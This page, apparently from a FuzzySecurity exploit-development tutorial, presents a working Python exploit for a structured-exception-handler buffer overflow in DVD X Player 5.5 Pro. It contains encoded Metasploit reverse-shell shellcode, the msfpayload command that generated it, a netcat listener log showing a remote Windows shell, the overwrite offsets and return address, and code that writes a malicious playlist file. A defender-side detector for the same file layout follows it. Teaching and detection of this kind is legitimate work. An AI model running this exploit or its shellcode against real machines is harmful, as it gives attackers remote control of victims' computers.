DVD X Player 5.5 Pro (*.plf BOF)

Created for part three of my exploit development tutorials covering "Structured Exception Handler". 

#!/usr/bin/env python3
 
#----------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 Pro SEH (local BOF)                                    #
# OS: Tested XP PRO SP3 (EPG.dll should be universal)                              #
# Author: b33f (Ruben Boonen)                                                      #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications       #
#           /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe                  #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/3.html                             #
#----------------------------------------------------------------------------------#
# root@bt:~# nc -lvp 9988                                                          #
# listening on [any] 9988 ...                                                      #
# 192.168.111.128: inverse host lookup failed: Unknown server error                #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044               #
# Microsoft Windows XP [Version 5.1.2600]                                          #
# (C) Copyright 1985-2001 Microsoft Corp.                                          #
#                                                                                  #
# G:\tutorial>ipconfig                                                             #
# ipconfig                                                                         #
#                                                                                  #
# Windows IP Configuration                                                         #
#                                                                                  #
#                                                                                  #
# Ethernet adapter Local Area Connection:                                          #
#                                                                                  #
#         Connection-specific DNS Suffix  . : localdomain                          #
#         IP Address. . . . . . . . . . . . : 192.168.111.128                      #
#         Subnet Mask . . . . . . . . . . . : 255.255.255.0                        #
#         Default Gateway . . . . . . . . . :                                      #
#                                                                                  #
# G:\tutorial>                                                                     #
#----------------------------------------------------------------------------------#
  
filename = "evil.plf"   # playlist file the vulnerable player parses
 
#---------------------------------------------------------------------------------------------------------------#
# msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c #
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)                                                  #
#---------------------------------------------------------------------------------------------------------------#
shellcode = (
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54")
 
#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A'                                                #
#                                                                                  #
# offset to: (2) nseh 608-bytes, (1) seh 112-bytes                                 #
# (2) nseh = '\xEB\x06' => jump short 6-bytes                                      #
# (1) seh = 0x61617619 : pop esi # pop edi # ret  | EPG.dll                        #
# (3) shellcode space = 1384-bytes                                                 #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure:                                                           #
#                                    \---------------->                            #
#     [AAA..................AAA]   [nseh]   [seh]   [BBB..................BBB]     #
#     \-------------------------------------->                                     #
#                                     <-------/                                    #
# (1) Initial EIP overwrite, SEH leads us back 4-bytes to nSEH                     #
# (2) nSEH jumps over SEH and redirects execution to our B's                       #
# (3) We place our shellcode here ... Game Over!                                   #
#----------------------------------------------------------------------------------#

evil = "\x90" * 20 + shellcode   # short NOP sled in front of the payload
buffer = "A" * 608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B" * (1384 - len(evil))

# Each "\x.." escape above is one byte, so encode with latin-1 and write the
# file in binary mode; this keeps the byte layout identical under Python 3.
with open(filename, 'wb') as textfile:
    textfile.write(buffer.encode('latin-1'))
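As an added example (not part of b33f's exploit, and not code from DVD X Player), the layout in the comment block above turned into a defender-side check: it reports whether a *.plf file shows the 608-byte filler, the "\xEB\x06" short jump in the nSEH slot, the EPG.dll pop/pop/ret pointer and a NOP sled. The two sample files are constructed here, with the shellcode replaced by filler bytes.

```python
#!/usr/bin/env python3
"""Defender-side check: does a *.plf playlist carry the SEH-overwrite layout
described in the exploit comments (filler, nSEH short jump, SEH pointer, payload)?"""
import struct

# Layout constants taken from the exploit comments on this page.
NSEH_OFFSET = 608              # bytes of filler before nSEH is overwritten
SEH_OFFSET = NSEH_OFFSET + 4   # the SEH handler pointer follows nSEH
KNOWN_SEH = 0x61617619         # pop esi # pop edi # ret in EPG.dll (from the page)
MIN_SLED = 8                   # treat this many leading 0x90 bytes as a NOP sled


def find_seh_layout(data: bytes) -> dict:
    """Return the layout features found in data, or {} when none match."""
    findings = {}
    if len(data) < SEH_OFFSET + 4:
        return findings
    filler = data[:NSEH_OFFSET]
    nseh = data[NSEH_OFFSET:SEH_OFFSET]
    seh = struct.unpack("<I", data[SEH_OFFSET:SEH_OFFSET + 4])[0]
    # A real playlist path is never 608 copies of a single byte.
    if len(set(filler)) == 1:
        findings["uniform_filler"] = True
    # "\xEB\x06" is jmp short +6: it hops over the 4-byte SEH slot into the payload.
    if nseh[:2] == b"\xEB\x06":
        findings["short_jump_nseh"] = True
    if seh == KNOWN_SEH:
        findings["known_ppr_address"] = hex(seh)
    tail = data[SEH_OFFSET + 4:]
    sled = len(tail) - len(tail.lstrip(b"\x90"))
    if sled >= MIN_SLED:
        findings["nop_sled_len"] = sled
    return findings


def is_suspicious(data: bytes) -> bool:
    """Flag when the nSEH short jump is paired with uniform filler or a NOP sled."""
    f = find_seh_layout(data)
    return "short_jump_nseh" in f and ("uniform_filler" in f or "nop_sled_len" in f)


# Constructed samples (not real files): an ordinary playlist, and the page's
# layout with the shellcode replaced by filler bytes.
BENIGN = b"C:\\movies\\clip.avi\r\n" * 40
LAYOUT = (b"A" * 608 + b"\xEB\x06\x90\x90" + struct.pack("<I", KNOWN_SEH)
          + b"\x90" * 20 + b"B" * 1364)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("layout", LAYOUT)):
        print(name, is_suspicious(sample), find_seh_layout(sample))
```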

© Copyright FuzzySecurity